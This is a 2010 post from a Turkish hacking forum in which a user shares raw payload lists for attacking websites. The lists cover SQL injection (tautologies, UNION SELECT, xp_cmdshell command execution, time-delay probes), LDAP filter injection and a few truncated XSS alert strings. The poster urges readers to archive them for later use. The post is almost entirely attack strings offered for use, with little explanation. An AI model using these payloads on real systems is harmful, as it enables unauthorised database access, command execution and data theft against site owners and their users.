HACKER OO1
HOŞGELDİNİZ HACKEROO1
FORUM : BLOK : SİTEMİZ : =İÇRESİNDE
MÜKEMMEL PAYLAŞIMLAR VARDIR
SİZLERİNDE ARAMIZDA OLMANIZI İSTERİZ,TAMAMEN ÜCRETSİZ OLAN
PAYLAŞIMLAR VE ÜYELİGİMİZ:
KESİNLİKLE SİZLERİN İSTEKLERİNİZ
ÜZERİNE HAZIRLANMIŞ VE TASARLANMIŞTIR
SİTEMİZDE İYİ VAKİT GECİRMENİZ DİLEGİYLE
ADMİN

sql xss xml mssql traversal injection tablolamalari

Önceki başlık Sonraki başlık Aşağa gitmek

sql xss xml mssql traversal injection tablolamalari

Mesaj tarafından el-perest Bir Çarş. Ekim 13, 2010 1:13 pm

şimdi bi konu acacam godoot bunlarda neyın nesı dıyen arkadaslar ıllakı aramaızdan cıkacak ben kısaca bunların sıze tarıfını vereyım Sql,Xss,Xml,Traversal Tablolamada kullanılan ve bu saldırılarda kullanılan genel kodlardır.. mesela bunu nasıl dusunebılırısnız xss daki alert gıbı

">alert(/By_GoD00t/)

şimdi kodlarımızı vereyım..öncelıkle belırteyım oturup bu kodları yazacak deılım.. bende htt ye ve sız degerlı arkadaslarıma ogrenmesı ıcın gereklı caba olarak gorun bunu

godoot

BUNLARI ANLAYAN ANLAMAYAN ARSIVİNE ATSIN BIGUN LAZIM OLUR

SQL


Kod:
or%201=1 --
' or 1=1 or ''='
" or 1=1 or ""="
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
@variable
,@variable
PRINT
PRINT @@variable
select
insert
as
or
procedure
limit
order by
asc
desc
delete
update
distinct
having
truncate
replace
like
handler
bfilename
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
exec xp
exec sp
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup


PHP KODLARI
Kod:
[Linkleri görebilmek için üye olun veya giriş yapın.]
--sp_password
\x27UNION SELECT
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
to_timestamp_tz
tz_offset
<>"'%Wink(&+
'%20or%201=1
%27%20or%201=1
%20$(sleep%2050)
%20'sleep%2050'
char%4039%41%2b%40SELECT
'%20OR
'sqlattempt1
(sqlattempt2)
|
%7C
*|
%2A%7C
*(|(mail=*))
%2A%28%7C%28mail%3D%2A%29%29
*(|(objectclass=*))
%2A%28%7C%28objectclass%3D%2A%29%29
(
%28
)
%29
&
%26
!
%21
' or 1=1 or ''='
' or ''='
x' or 1=1 or 'x'=y
/
//
//*
*/*


XSS

Kod:
">"
alert("XSS")
<alert("XSS");//<
alert(document

::::Türkün dostlugu kıymetlidir ! Düşmanlıgı ise çok şiddetlidir:::::HaCkEr oo1:::::
[Linkleri görebilmek için üye olun veya giriş yapın.]

[Linkleri görebilmek için üye olun veya giriş yapın.]

[Linkleri görebilmek için üye olun veya giriş yapın.]

el-perest
GENEL BÖLÜM
GENEL BÖLÜM

Mesaj Sayısı : 69
rep-puan : 2147485927
Rep Puan : 2
Kayıt tarihi : 07/09/10

Oyun Sayfası
Oyun Alanı:

Kullanıcı profilini gör http://www.hackeroo1.ace.st----http://www.sohbetcidostlar.com

Sayfa başına dön Aşağa gitmek

Önceki başlık Sonraki başlık Sayfa başına dön


 
Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap veremezsiniz